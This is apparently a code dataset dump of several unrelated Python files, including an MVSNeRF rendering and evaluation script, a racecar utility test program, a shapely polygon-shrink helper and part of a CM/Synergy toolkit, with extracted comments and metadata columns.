-*- coding: utf-8 -*- ----------------------------------------------------------------------------- Copyright (c) 2015, Vispy Development Team. All Rights Reserved. Distributed under the (new) BSD License. See LICENSE.txt for more info. ----------------------------------------------------------------------------- ------------------------------------------------------------ Buffer class --- Views on this buffer (stored using weakrefs) To invalidate buffer views Bytesize in bytes, set in resize_bytes() Set data If the whole buffer is to be written, we clear any pending data (because they will be overwritten anyway) Use SIZE to discard any previous data setting Only set data if there *is* data Invalidate any view on this buffer -------------------------------------------------------- DataBuffer class --- number of elements in buffer, set in resize_bytes() Can be overrriden by subclasses Setting a whole field of the buffer: only allowed if we have CPU storage. Note this case (key is string) only happen with base buffer Setting one or several elements Contiguous update? Make sure data is an array Make sure data is big enough Set data * self.itemsize Note that this class is a bit evil: it is a subclass of GLObject, Buffer and DataBuffer, but any of these __init__'s are not called ... Note how this never runs the super's __init__, all attributes must thus be set here ... ------------------------------------------------------ VertexBuffer class --- Build a structured view of the data if: -> it is not already a structured array -> shape if 1-D or last dimension is 1,2,3 or 4 ------------------------------------------------------- IndexBuffer class --- | 5,316 | en | 0.780625 |
import argparse
import re
####
# # Box 1
####
import sys,os,imageio,lpips
root = '/home/youngsun/documents/mvs/mvsnerf_timing'
os.chdir(root)
sys.path.append(root)
from opt_src import config_parser
from data import dataset_dict
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
# models
from models_src import *
from renderer_src import *
from data.ray_utils import get_rays
from tqdm import tqdm
from skimage.metrics import structural_similarity
# pytorch-lightning
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning import LightningModule, Trainer, loggers
from data.ray_utils import ray_marcher
import torch
# Pin all CUDA work in this process to GPU 0.
torch.cuda.set_device(0)
# NOTE(review): setting CUDA_VISIBLE_DEVICES after torch is imported and a
# device has already been selected has no effect on this process — confirm
# whether this is intended or leftover.
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
####
# # Box 2
####
def decode_batch(batch):
    """Split a dataloader batch into its ray (B, 8) and RGB (B, 3) parts."""
    return batch['rays'], batch['rgbs']
def unpreprocess(data, shape=(1, 1, 3, 1, 1)):
    """Undo ImageNet-style per-channel normalization for visualization.

    `data` is laid out (N, V, C, H, W); this inverts x -> (x - mean) / std
    channel-wise, i.e. returns x * std + mean.
    """
    neg_mean_over_std = torch.tensor(
        [-0.485 / 0.229, -0.456 / 0.224, -0.406 / 0.225],
        device=data.device).view(*shape)
    inv_std = torch.tensor(
        [1 / 0.229, 1 / 0.224, 1 / 0.225],
        device=data.device).view(*shape)
    return (data - neg_mean_over_std) / inv_std
def read_depth(filename):
    """Load a PFM depth map, downsample it by 2x and center-crop it.

    Returns
    -------
    depth_h : np.ndarray of float32, shape (512, 640)
        Half-resolution, cropped depth map.
    mask : np.ndarray of bool
        True where the depth value is valid (> 0).
    """
    depth_h = np.array(read_pfm(filename)[0], dtype=np.float32)  # (800, 800)
    depth_h = cv2.resize(depth_h, None, fx=0.5, fy=0.5,
                         interpolation=cv2.INTER_NEAREST)  # (600, 800)
    depth_h = depth_h[44:556, 80:720]  # (512, 640)
    # BUG FIX: the mask was previously computed from an undefined name
    # ``depth`` (only ever assigned in a commented-out line), which raised
    # NameError at runtime. Build it from the processed depth map instead.
    mask = depth_h > 0
    return depth_h, mask
# Perceptual-similarity metric (LPIPS with a VGG backbone). Constructed once
# at module import time because it loads pretrained weights.
loss_fn_vgg = lpips.LPIPS(net='vgg')
# Convert a mean-squared error into PSNR (in decibels).
mse2psnr = lambda x : -10. * np.log(x) / np.log(10.)
####
# # Box 3
####
# create function for returning dense, sparse, far views
def get_source_imgs(source_dataset, target_position, N_views, device, view_type='nearest',
                    fixed_idxs=None,
                    is_source_target_overlap=False):
    """Pick N_views source views around `target_position` (strategy chosen by
    `view_type`, see get_pair_idx) and load them from `source_dataset` onto
    `device`.

    Returns the 4-tuple produced by ``read_source_views``:
    (imgs_source, proj_mats, near_far_source, pose_source).
    """
    selected = get_pair_idx(source_dataset, target_position, N_views,
                            view_type, fixed_idxs, is_source_target_overlap)
    return source_dataset.read_source_views(pair_idx=selected, device=device)
def get_pair_idx(source_dataset, target_position, N_views, view_type='nearest',
                 fixed_idxs=None,
                 is_source_target_overlap=False):
    """Rank source views by L1 camera-center distance to `target_position`
    and select N_views of them according to `view_type`.

    view_type is one of:
      'nearest'  - the N closest views ("as dense as possible")
      'dense'    - random subset of the ~1.5*N closest views
      'random'   - uniformly random views
      'sparse'   - one random view per distance stratum
      'far'      - random subset of the ~1.5*N farthest views
      'farthest' - the N farthest views
      'fixed'    - simply return `fixed_idxs`

    When `is_source_target_overlap` is set, the single closest view is
    dropped so a source view identical to the target cannot be picked.
    Returns a list of dataset image indices (except for 'fixed').
    """
    if view_type == 'fixed':
        return fixed_idxs
    centers = source_dataset.poses[:, :3, 3]
    order = np.argsort(np.sum(np.abs(centers - target_position), axis=-1))
    if is_source_target_overlap:
        order = order[1:]
    if view_type == 'nearest':
        chosen = order[:N_views]
    elif view_type == 'dense':
        subset = torch.randperm(int(np.rint(N_views * 1.5)))[:N_views].sort()[0]
        chosen = order[subset]
    elif view_type == 'random':
        subset = torch.randperm(len(order))[:N_views]
        chosen = order[subset]
    elif view_type == 'sparse':
        edges = torch.linspace(0, len(order), steps=N_views + 1).round()
        picks = [np.random.choice(range(int(edges[i]), int(edges[i + 1])))
                 for i in range(len(edges) - 1)]
        chosen = order[picks]
    elif view_type == 'far':
        subset = torch.randperm(int(np.rint(N_views * 1.5)))[:N_views].sort(
            descending=True)[0]
        chosen = order[::-1][subset]
    elif view_type == 'farthest':
        chosen = order[::-1][:N_views]
    return [source_dataset.img_idx[item] for item in chosen]
####
# # Box 4
####
def render_blender(view_type='nearest',
                   scenes=['ficus'],
                   num_src_views=3,
                   ckpt='base-3src-dense.tar',
                   source_split='train',
                   target_split='val',
                   select_index=None,
                   is_fixed=False,
                   is_source_target_overlap=False
                   ):
    """Render target views of NeRF-synthetic (Blender) scenes with MVSNeRF
    and report PSNR / SSIM / LPIPS(VGG) per scene and over all scenes.

    Parameters
    ----------
    view_type : str
        Source-view selection strategy (see get_pair_idx).
    scenes : list of str
        Scene names under the nerf_synthetic data root. (Mutable default is
        kept for interface compatibility; it is never mutated here.)
    num_src_views : int
        Number of source views fed to the MVS network.
    ckpt : str
        Checkpoint file name under ./ckpts; also used to name the output dir.
    source_split, target_split : str
        Dataset splits providing source views and render targets.
    select_index : list of int | None
        Subset of target view indices to render (None = all).
    is_fixed : bool
        If True, source views are selected once (around the middle target)
        and reused for every target view.
    is_source_target_overlap : bool
        If True, the closest source view is excluded so source != target.

    Notes
    -----
    ``device`` is expected to come from the star-imports of models_src /
    renderer_src — TODO confirm; it is not defined in this file.
    """
    psnr_all,ssim_all,LPIPS_vgg_all = [],[],[]
    for i_scene, scene in enumerate(scenes):
        psnr,ssim,LPIPS_vgg = [],[],[]
        # Build a CLI-style string and reuse the training config parser.
        cmd = f'--datadir /mnt/hdd/mvsnerf_data/nerf_synthetic/{scene} \
        --dataset_name blender_src --white_bkgd \
        --net_type v0 --ckpt ./ckpts/{ckpt} --num_src_views {num_src_views}'
        save_dir = f'/mnt/hdd/youngsun/mvsnerf_timing/results/{ckpt[:-4]}/blender-{num_src_views}-'
        if is_fixed:
            save_dir += 'fixed-'
        save_dir += f'{view_type}-'
        save_dir += f'{source_split}-{target_split}/{scene}'
        args = config_parser(cmd.split())
        args.use_viewdirs = True
        args.N_samples = 128
        # Feature dimension: 8 base channels + 4 per source view.
        args.feat_dim = 8+4*num_src_views
        # create models only once; they are reused for all scenes
        if 0==i_scene:
            render_kwargs_train, render_kwargs_test, start, grad_vars = create_nerf_mvs(args, use_mvs=True, dir_embedder=False, pts_embedder=True)
            filter_keys(render_kwargs_train)
            MVSNet = render_kwargs_train['network_mvs']
            render_kwargs_train.pop('network_mvs')
        datadir = args.datadir
        datatype = 'train'
        pad = 16
        args.chunk = 5120
        print('============> rendering dataset <===================')
        dataset_source = dataset_dict[args.dataset_name](args, split=source_split)
        dataset_target = dataset_dict[args.dataset_name](args, split=target_split, select_index=select_index)
        target_idx = dataset_target.img_idx
        save_as_image = True
        # BUG FIX: `rgbs` was never initialized, so the save_as_image=False
        # path (frame accumulation for the mp4 below) crashed with NameError.
        rgbs = []
        os.makedirs(save_dir, exist_ok=True)
        # NOTE(review): the MVS encoder is run in train() mode during
        # rendering — confirm this is intended (e.g. for padding behavior).
        MVSNet.train()
        MVSNet = MVSNet.cuda()
        with torch.no_grad():
            try:
                tqdm._instances.clear()
            except Exception:
                pass
            for i, batch in enumerate(tqdm(dataset_target)):
                torch.cuda.empty_cache()
                rays, img = decode_batch(batch)
                rays = rays.squeeze().to(device)  # (H*W, 3)
                img = img.squeeze().cpu().numpy()  # (H, W, 3)
                if is_fixed:
                    # Select the source views once (around the middle target
                    # view) and reuse them for every subsequent target.
                    if i == 0:
                        if select_index is not None:
                            pair_idx = get_pair_idx(source_dataset=dataset_source,
                                                    target_position=dataset_target.poses[[len(select_index)//2],:3,3],
                                                    N_views=args.num_src_views,
                                                    view_type=view_type)
                        else:
                            pair_idx = get_pair_idx(source_dataset=dataset_source,
                                                    target_position=dataset_target.poses[[50],:3,3],
                                                    N_views=args.num_src_views,
                                                    view_type=view_type)
                        imgs_source, proj_mats, near_far_source, pose_source = dataset_source.read_source_views(pair_idx=pair_idx,
                                                                                                               device=device)
                else:
                    # Re-select source views for each target view.
                    imgs_source, proj_mats, near_far_source, pose_source = get_source_imgs(source_dataset=dataset_source,
                                                                                           target_position=dataset_target.poses[[i],:3,3],
                                                                                           N_views=args.num_src_views, device=device,
                                                                                           view_type=view_type)
                # Encode the source views into a cost-volume feature once per
                # target view, then render rays in chunks against it.
                volume_feature, _, _ = MVSNet(imgs_source, proj_mats, near_far_source, pad=pad)
                imgs_source = unpreprocess(imgs_source)
                N_rays_all = rays.shape[0]
                rgb_rays, depth_rays_preds = [],[]
                for chunk_idx in range(N_rays_all//args.chunk + int(N_rays_all%args.chunk>0)):
                    xyz_coarse_sampled, rays_o, rays_d, z_vals = ray_marcher(rays[chunk_idx*args.chunk:(chunk_idx+1)*args.chunk],
                                                                             N_samples=args.N_samples)
                    # Converting world coordinate to ndc coordinate
                    H, W = img.shape[:2]
                    inv_scale = torch.tensor([W - 1, H - 1]).to(device)
                    w2c_ref, intrinsic_ref = pose_source['w2cs'][0], pose_source['intrinsics'][0].clone()
                    intrinsic_ref[:2] *= args.imgScale_test/args.imgScale_train
                    xyz_NDC = get_ndc_coordinate(w2c_ref, intrinsic_ref, xyz_coarse_sampled, inv_scale,
                                                 near=near_far_source[0], far=near_far_source[1], pad=pad*args.imgScale_test)
                    # rendering
                    rgb, disp, acc, depth_pred, alpha, extras = rendering(args, pose_source, xyz_coarse_sampled,
                                                                          xyz_NDC, z_vals, rays_o, rays_d,
                                                                          volume_feature,imgs_source, **render_kwargs_train)
                    rgb, depth_pred = torch.clamp(rgb.cpu(),0,1.0).numpy(), depth_pred.cpu().numpy()
                    rgb_rays.append(rgb)
                    depth_rays_preds.append(depth_pred)
                # Reassemble chunked ray results into full images.
                depth_rays_preds = np.concatenate(depth_rays_preds).reshape(H, W)
                depth_rays_preds, _ = visualize_depth_numpy(depth_rays_preds, near_far_source)
                rgb_rays = np.concatenate(rgb_rays).reshape(H, W, 3)
                # Side-by-side panel: source views | GT | prediction | depth.
                img_vis = np.concatenate((img*255,rgb_rays*255,depth_rays_preds),axis=1)
                img_vis = np.concatenate((torch.cat(torch.split(imgs_source*255, [1]*num_src_views, dim=1),-1).squeeze().permute(1,2,0).cpu().numpy(),img_vis),axis=1)
                if save_as_image:
                    imageio.imwrite(f'{save_dir}/{scene}_{target_idx[i]:03d}.png', img_vis.astype('uint8'))
                else:
                    rgbs.append(img_vis.astype('uint8'))
                # quantitative metrics: center-crop to the inner 80% first
                H_crop, W_crop = np.array(rgb_rays.shape[:2])//10
                img = img[H_crop:-H_crop,W_crop:-W_crop]
                rgb_rays = rgb_rays[H_crop:-H_crop,W_crop:-W_crop]
                psnr.append( mse2psnr(np.mean((rgb_rays-img)**2)))
                ssim.append( structural_similarity(rgb_rays, img, multichannel=True))
                # image should be RGB, normalized to [-1,1] for LPIPS
                img_tensor = torch.from_numpy(rgb_rays)[None].permute(0,3,1,2).float()*2-1.0
                img_gt_tensor = torch.from_numpy(img)[None].permute(0,3,1,2).float()*2-1.0
                LPIPS_vgg.append( loss_fn_vgg(img_tensor, img_gt_tensor).item())
            print(f'=====> scene: {scene} mean psnr {np.mean(psnr)} ssim: {np.mean(ssim)} lpips: {np.mean(LPIPS_vgg)}')
            psnr_all.append(psnr);ssim_all.append(ssim);LPIPS_vgg_all.append(LPIPS_vgg)
        if not save_as_image:
            imageio.mimwrite(f'{save_dir}/{scene}_spiral.mp4', np.stack(rgbs), fps=20, quality=10)
    print(f'=====> all mean psnr {np.mean(psnr_all)} ssim: {np.mean(ssim_all)} lpips: {np.mean(LPIPS_vgg_all)}')
####
# # Box 5
####
def render_blender_all_settings(scenes=['lego'], num_src_views=3, ckpt='base-3src-dense.tar', source_split='train', target_split='val', select_index=[30, 60, 90], view_types=[1]):
    """Run render_blender once per requested view-type code, in order.

    Codes: 1 nearest, 2 dense, 3 sparse, 4 far, 5 random,
    6 fixed nearest, 7 fixed sparse, 8 unseen nearest, 9 unseen sparse.
    """
    # (code, view_type, is_fixed, is_source_target_overlap) — the None/True
    # values mirror the original call sites exactly.
    dispatch = [
        (1, 'nearest', None, False),
        (2, 'dense', None, False),
        (3, 'sparse', None, False),
        (4, 'far', None, False),
        (5, 'random', None, False),
        (6, 'nearest', True, False),
        (7, 'sparse', True, False),
        (8, 'nearest', None, True),
        (9, 'sparse', None, True),
    ]
    for code, view_type, fixed, overlap in dispatch:
        if code in view_types:
            render_blender(view_type, scenes, num_src_views, ckpt,
                           source_split, target_split, select_index,
                           is_fixed=fixed, is_source_target_overlap=overlap)
    return None
####
# # Box 6
####
####
# # Box 7
####
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--view_types', nargs="+", type=int,
                        help= 'Enter list of view types to render:' \
                        ' 1 - nearest, 2 - dense, 3 - sparse, 4 - far, 5 - random, ' \
                        '6 - fixed nearset, 7 - fixed sparse, 8 - unseen nearest, 9 - unseen sparse')
    parser.add_argument('--view_indexes', nargs="+", type=int, const=None, default=None,
                        help= 'default - all views (100)')
    parser.add_argument('--scenes', nargs='+', default=[])
    parser.add_argument('--ckpts', nargs='+', default=[])
    parser.add_argument('--source', type=str, default='train')
    parser.add_argument('--target', type=str, default='val')
    args = parser.parse_args()
    # Render each checkpoint in turn with every requested view-type setting.
    for ckpt in args.ckpts:
        # The source-view count is parsed from the checkpoint file name,
        # e.g. 'base-3src-dense.tar' -> 3 (first number in the name).
        num_src_views = int(re.findall('[0-9]+', ckpt)[0])
        render_blender_all_settings(scenes=args.scenes,
                                    num_src_views=num_src_views,
                                    ckpt=ckpt,
                                    source_split=args.source,
                                    target_split=args.target,
                                    select_index=args.view_indexes,
                                    view_types=args.view_types)
        # Free cached GPU memory between checkpoints.
        torch.cuda.empty_cache()
"""
Copyright MIT and Harvey Mudd College
MIT License
Summer 2020
A simple program which can be used to manually test racecar_utils functionality.
"""
########################################################################################
# Imports
########################################################################################
import math
import sys
sys.path.insert(1, "../library")
import racecar_core
import racecar_utils as rc_utils
########################################################################################
# Global variables
########################################################################################
# Global Racecar object driven by start()/update() below.
rc = racecar_core.create_racecar()
# HSV bounds for red; the hue range wraps around 0 (170 -> 10) - presumably
# rc_utils.find_contours handles the wrap-around; TODO confirm.
RED = ((170, 50, 50), (10, 255, 255))
# Overwritten in start(); show_triggers/show_joysticks are set there but
# never read anywhere in this file.
max_speed = 0
show_triggers = False
show_joysticks = False
########################################################################################
# Functions
########################################################################################
def start():
    """
    This function is run once every time the start button is pressed
    """
    global max_speed
    global show_triggers
    global show_joysticks

    print("Start function called")

    # Reset the car and the demo state to known defaults.
    rc.set_update_slow_time(0.5)
    rc.drive.stop()
    max_speed = 0.25
    show_triggers = False
    show_joysticks = False

    # Sanity-check the numeric helpers in racecar_utils.
    remap_cases = [
        ((5, 0, 10, 0, 50), 25),
        ((5, 0, 20, 1000, 900), 975),
        ((2, 0, 1, -10, 10), 30),
        ((2, 0, 1, -10, 10, True), 10),
    ]
    for call_args, expected in remap_cases:
        assert rc_utils.remap_range(*call_args) == expected

    clamp_cases = [((3, 0, 10), 3), ((-2, 0, 10), 0), ((11, 0, 10), 10)]
    for call_args, expected in clamp_cases:
        assert rc_utils.clamp(*call_args) == expected

    # Print start message (string identical to the original banner).
    banner = (
        ">> Test Utils: A testing program for the racecar_utils library.\n"
        "\n"
        "Controls:\n"
        "   Right trigger = accelerate forward\n"
        "   Left trigger = accelerate backward\n"
        "   Left joystick = turn front wheels\n"
        "   A button = Take a color image and crop it to the top left\n"
        "   B button = Take a color image and identify the largest red contour\n"
        "   X button = Take a depth image and print several statistics\n"
        "   Y button = Take a lidar scan and print several statistics\n"
    )
    print(banner)
def update():
    """
    After start() is run, this function is run every frame until the back button
    is pressed
    """
    # Display the color image cropped to the top left
    if rc.controller.was_pressed(rc.controller.Button.A):
        image = rc.camera.get_color_image()
        cropped = rc_utils.crop(
            image, (0, 0), (rc.camera.get_height() // 2, rc.camera.get_width() // 2)
        )
        rc.display.show_color_image(cropped)

    # Find and display the largest red contour in the color image
    if rc.controller.was_pressed(rc.controller.Button.B):
        image = rc.camera.get_color_image()
        contours = rc_utils.find_contours(image, RED[0], RED[1])
        largest_contour = rc_utils.get_largest_contour(contours)

        if largest_contour is not None:
            center = rc_utils.get_contour_center(largest_contour)
            area = rc_utils.get_contour_area(largest_contour)
            print("Largest red contour: center={}, area={:.2f}".format(center, area))
            rc_utils.draw_contour(image, largest_contour, rc_utils.ColorBGR.green.value)
            rc_utils.draw_circle(image, center, rc_utils.ColorBGR.yellow.value)
            rc.display.show_color_image(image)
        else:
            print("No red contours found")

    # Print depth image statistics and show the cropped upper portion
    if rc.controller.was_pressed(rc.controller.Button.X):
        depth_image = rc.camera.get_depth_image()

        # Measure average distance at several points
        left_distance = rc_utils.get_pixel_average_distance(
            depth_image, (rc.camera.get_height() // 2, rc.camera.get_width() // 4),
        )
        center_distance = rc_utils.get_depth_image_center_distance(depth_image)
        # kernel_size=1 disables averaging: raw single-pixel reading.
        center_distance_raw = rc_utils.get_depth_image_center_distance(depth_image, 1)
        right_distance = rc_utils.get_pixel_average_distance(
            depth_image, (rc.camera.get_height() // 2, 3 * rc.camera.get_width() // 4),
        )
        print(f"Depth image left distance: {left_distance:.2f} cm")
        print(f"Depth image center distance: {center_distance:.2f} cm")
        print(f"Depth image raw center distance: {center_distance_raw:.2f} cm")
        print(f"Depth image right distance: {right_distance:.2f} cm")

        # Measure pixels where the kernel falls off the edge of the photo
        upper_left_distance = rc_utils.get_pixel_average_distance(
            depth_image, (2, 1), 11
        )
        lower_right_distance = rc_utils.get_pixel_average_distance(
            depth_image, (rc.camera.get_height() - 2, rc.camera.get_width() - 5), 13
        )
        print(f"Depth image upper left distance: {upper_left_distance:.2f} cm")
        print(f"Depth image lower right distance: {lower_right_distance:.2f} cm")

        # Find the closest point in the top two thirds of the image.
        # (Fix: rows [0, 2h/3) are the TOP of the image; the old comment said
        # "bottom third" and the old message said "upper half".)
        cropped = rc_utils.crop(
            depth_image,
            (0, 0),
            (rc.camera.get_height() * 2 // 3, rc.camera.get_width()),
        )
        closest_point = rc_utils.get_closest_pixel(cropped)
        closest_distance = cropped[closest_point[0]][closest_point[1]]
        print(
            f"Depth image closest point (top two thirds): (row={closest_point[0]}, col={closest_point[1]}), distance={closest_distance:.2f} cm"
        )
        rc.display.show_depth_image(cropped, points=[closest_point])

    # Print lidar statistics and show visualization with closest point highlighted
    if rc.controller.was_pressed(rc.controller.Button.Y):
        lidar = rc.lidar.get_samples()
        front_distance = rc_utils.get_lidar_average_distance(lidar, 0)
        right_distance = rc_utils.get_lidar_average_distance(lidar, 90)
        back_distance = rc_utils.get_lidar_average_distance(lidar, 180)
        left_distance = rc_utils.get_lidar_average_distance(lidar, 270)
        print(f"Front LIDAR distance: {front_distance:.2f} cm")
        print(f"Right LIDAR distance: {right_distance:.2f} cm")
        print(f"Back LIDAR distance: {back_distance:.2f} cm")
        print(f"Left LIDAR distance: {left_distance:.2f} cm")
        closest_sample = rc_utils.get_lidar_closest_point(lidar)
        print(
            f"Closest LIDAR point: {closest_sample[0]:.2f} degrees, {closest_sample[1]:.2f} cm"
        )
        rc.display.show_lidar(lidar, highlighted_samples=[closest_sample])

    # Print lidar distance in the direction the right joystick is pointed
    rjoy_x, rjoy_y = rc.controller.get_joystick(rc.controller.Joystick.RIGHT)
    if abs(rjoy_x) > 0 or abs(rjoy_y) > 0:
        lidar = rc.lidar.get_samples()
        # atan2(x, y): 0 degrees is straight ahead, increasing clockwise.
        angle = (math.atan2(rjoy_x, rjoy_y) * 180 / math.pi) % 360
        distance = rc_utils.get_lidar_average_distance(lidar, angle)
        print(f"LIDAR distance at angle {angle:.2f} = {distance:.2f} cm")

    # Default drive-style controls
    left_trigger = rc.controller.get_trigger(rc.controller.Trigger.LEFT)
    right_trigger = rc.controller.get_trigger(rc.controller.Trigger.RIGHT)
    left_joystick = rc.controller.get_joystick(rc.controller.Joystick.LEFT)
    rc.drive.set_speed_angle(right_trigger - left_trigger, left_joystick[0])
########################################################################################
# DO NOT MODIFY: Register start and update and begin execution
########################################################################################
if __name__ == "__main__":
    # No update_slow handler is registered (third argument is None).
    rc.set_start_update(start, update, None)
    rc.go()
| labs/test_utils.py | 7,768 | This function is run once every time the start button is pressed
After start() is run, this function is run every frame until the back button
is pressed
Copyright MIT and Harvey Mudd College
MIT License
Summer 2020
A simple program which can be used to manually test racecar_utils functionality.
Imports Global variables Functions Test numeric functions Print start message Display the color image cropped to the top left Find and display the largest red contour in the color image Print depth image statistics and show the cropped upper half Measure average distance at several points Measure pixels where the kernel falls off the edge of the photo Find closest point in bottom third Print lidar statistics and show visualization with closest point highlighted Print lidar distance in the direction the right joystick is pointed Default drive-style controls DO NOT MODIFY: Register start and update and begin execution | 922 | en | 0.786002 |
import numpy as np
from shapely import geometry
def shrink(coords: np.ndarray, dist: float) -> tuple:
    """Shrinks a 2D polygon by a given distance.
    The coordinates of the polygon are expected as an N x 2-matrix,
    and a positive distance results in inward shrinking.
    An empty set is returned if the shrinking operation removes all
    original elements.
    Args:
        coords: A matrix of coordinates.
        dist: The distance to shrink by.
    Returns:
        A tuple containing the x, y coordinates of the original set, as
        well as the x and y coordinates of the shrunken set, in that
        order (four sequences in total).
    """
    my_polygon = geometry.Polygon(coords)
    xy = my_polygon.exterior.xy
    # A negative buffer distance erodes (shrinks) the polygon inward.
    my_polygon_shrunken = my_polygon.buffer(-dist)
    try:
        xys = my_polygon_shrunken.exterior.xy
    except AttributeError:
        # The buffer collapsed the polygon to an empty geometry (no
        # .exterior); represent the result as a single point at the origin.
        xys = ([0], [0])  # Empty set
    return (*xy, *xys)
def hausdorff(A: np.ndarray, B: np.ndarray) -> float:
    """Computes the Hausdorff distance between two 2D polygons.
    Args:
        A: A matrix defining the first polygon.
        B: A matrix defining the second polygon.
    Returns:
        A float representing the Hausdorff distance.
    """
    poly_a = geometry.Polygon(A)
    poly_b = geometry.Polygon(B)
    return poly_a.hausdorff_distance(poly_b)
def read_polygon(file: str) -> np.ndarray:
    """Reads a polygon from a table.
    Args:
        file: Path to a file containing a plain text, tab-separated
            table with scalars.
    Returns:
        A matrix containing the data in the file.
    """
    table = np.genfromtxt(file)
    return table
if __name__ == "__main__":
    import matplotlib as mpl
    import matplotlib.pyplot as plt

    # Distance to shrink by
    dh = 0.01

    x, y, xs, ys = shrink(read_polygon('example.txt'), dh)

    ax = plt.subplot()
    ax.grid(which='major', alpha=0.5, color='k')
    ax.grid(which='minor', alpha=0.3, color='k', linestyle=':')
    ax.minorticks_on()
    ax.set_axisbelow(True)
    ax.fill(x, y, color='b', facecolor='lightskyblue',
            edgecolor='dodgerblue', label='Original', alpha=0.75)
    ax.fill(xs, ys, facecolor='mediumseagreen', edgecolor='forestgreen',
            label='Shrunk', alpha=0.75)
    ax.set_aspect('equal')
    ax.legend()
    # Regression value: expected Hausdorff distance between the original and
    # shrunk polygon for example.txt with dh = 0.01.
    golden = 0.01017601435813135
    assert(np.isclose(
        hausdorff(np.vstack([x, y]).T, np.vstack([xs, ys]).T),
        golden
    ))
    print("SUCCESS")
    print(f'Area original: {geometry.Polygon(np.vstack([x, y]).T).area:.6f}')
    print(f'Area shrunk: {geometry.Polygon(np.vstack([xs, ys]).T).area:.6f}')
    plt.show()
Args:
A: A matrix defining the first polygon.
B: A matrix defining the second polygon.
Returns:
A float representing the Hausdorff distance.
Reads a polygon from a table.
Args:
file: Path to a file containing a plain text, tab-separated
table with scalars.
Returns:
A matrix containing the data in the file.
Shrinks a 2D polygon by a given distance.
The coordinates of the polygon are expected as an N x 2-matrix,
and a positive distance results in inward shrinking.
An empty set is returned if the shrinking operation removes all
original elements.
Args:
coords: A matrix of coordinates.
dist: The distance to shrink by.
Returns:
A tuple containing the x, y coordinates of the original set, as
well as the x and y coordinates of the shrunken set, in that
order.
Empty set Distance to shrink by | 909 | en | 0.855529 |
''' Taking characters from terminal without pressing enter for movements '''
from __future__ import print_function
class AlarmException(Exception):
    """Exception used to break out of a blocking terminal read.

    NOTE(review): presumably raised from a SIGALRM timer handler so that a
    blocking read can be interrupted - confirm against the handler that
    raises it.
    """
    pass
#============================================================================
#Name : __init__.py
#Part of : Helium
#Copyright (c) 2009 Nokia Corporation and/or its subsidiary(-ies).
#All rights reserved.
#This component and the accompanying materials are made available
#under the terms of the License "Eclipse Public License v1.0"
#which accompanies this distribution, and is available
#at the URL "http://www.eclipse.org/legal/epl-v10.html".
#
#Initial Contributors:
#Nokia Corporation - initial contribution.
#
#Contributors:
#
#Description:
#===============================================================================
""" CM/Synergy Python toolkit.
"""
import logging
import netrc
import os
import re
import subprocess
import sys
import threading
import fileutils
import nokia.gscm
import tempfile
import socket
# Uncomment this line to enable logging in this module, or configure logging elsewhere
_logger = logging.getLogger("ccm")
#logging.basicConfig(level=logging.DEBUG)

# All object states Synergy may report; STATIC_OBJECT_STATES is the subset
# presumably treated as immutable/frozen states - TODO confirm usage.
VALID_OBJECT_STATES = ('working', 'checkpoint', 'public', 'prep', 'integrate', 'sqa', 'test','released')
STATIC_OBJECT_STATES = ('integrate', 'sqa', 'test','released')
# Lock file in the temp directory, presumably used to serialize session
# creation across processes - TODO confirm against callers.
CCM_SESSION_LOCK = os.path.join(tempfile.gettempdir(), "ccm_session.lock")
def _execute(command, timeout=None):
    """ Runs a command and returns the result data. """
    timeout_arg = "" if timeout is None else "--timeout=%s" % timeout
    # Wrap the call with timeout_launcher so a hung ccm call can be killed.
    cmdline = "python -m timeout_launcher %s -- %s" % (timeout_arg, command)
    proc = subprocess.Popen(cmdline, stdout=subprocess.PIPE,
                            stderr=subprocess.STDOUT, shell=True)
    stdout = proc.communicate()[0]
    proc.wait()
    _logger.debug(stdout)
    _logger.debug("Return code: %s" % proc.returncode)
    return (stdout, proc.returncode)
class CCMException(Exception):
    """ Base exception that should be raised by methods of this framework.

    The optional 'result' carries the Result object of the failed call.
    """
    def __init__(self, reason, result=None):
        Exception.__init__(self, reason)
        # Keep the originating result around for callers that want details.
        self.result = result
class Result(object):
    """Class that abstracts ccm call result handling.
    Subclass it to implement a new generic output parser.
    """
    def __init__(self, session):
        self._session = session
        # Never assigned in this class; available for callers/subclasses.
        self.status = None
        self._output = None
        self._output_str = None
    def _setoutput(self, output):
        # Default parser: store the raw text. Subclasses override this hook
        # to build a structured value from the ccm output.
        self._output = output
    def __setoutput(self, output):
        """ Internal function to allow overloading, you must override _setoutput.
        """
        # the output is automatically converted to ascii before any treatment
        if isinstance(output, unicode):
            self._output_str = output.encode('ascii', 'replace')
        else:
            self._output_str = output.decode('ascii', 'ignore')
        _logger.debug("output ---->")
        for line in self._output_str.splitlines():
            _logger.debug(line)
        _logger.debug("<----")
        self._setoutput(self._output_str)
    def _getoutput(self):
        """ Returns the content of _output. """
        return self._output
    def __str__(self):
        """ Synergy output log. """
        return self._output_str.encode('ascii', 'replace')
    # __setoutput is name-mangled (_Result__setoutput), so assigning to
    # .output always funnels through this class's ascii-conversion/logging
    # wrapper, which then delegates parsing to the overridable _setoutput.
    output = property(_getoutput, __setoutput)
class ResultWithError(Result):
    """ Result that additionally captures the stderr stream of a ccm call.

    Mirrors the Result.output mechanics: assigning to .error funnels through
    the name-mangled __seterror wrapper, which delegates to the overridable
    _seterror hook.
    """
    def __init__(self, session):
        Result.__init__(self, session)
        self._error = None
        self._error_str = None
    def _seterror(self, error):
        # Default parser: store the raw error text; override in subclasses.
        self._error = error
    def __seterror(self, error):
        """ Internal function to allow overloading, you must override _seterror.
        """
        # the error output is automatically converted to ascii before any treatment
        if isinstance(error, unicode):
            self._error_str = error.encode('ascii', 'replace')
        else:
            self._error_str = error.decode('ascii', 'ignore')
        _logger.debug("error ---->")
        for line in self._error_str.splitlines():
            _logger.debug(line)
        _logger.debug("<----")
        self._seterror(self._error_str)
    def _geterror(self):
        """ Returns the content of _error. """
        _logger.debug("_geterror")
        return self._error
    error = property(_geterror, __seterror)
class ProjectCheckoutResult(Result):
    """ Project checkout output parser.
    Sets project to the created project or None if failed.
    """
    def __init__(self, session, project):
        Result.__init__(self, session)
        self.__project = project
        self.__result_project = None
    def _setoutput(self, output):
        """ Parsing the output of the checkout command. """
        self._output = output
        for line in output.splitlines():
            # The new project's name is reported in the "Saved work area
            # options" line; create a wrapper for it via the session factory.
            mresult = re.match(r"Saved work area options for project: '(.+)'", line, re.I)
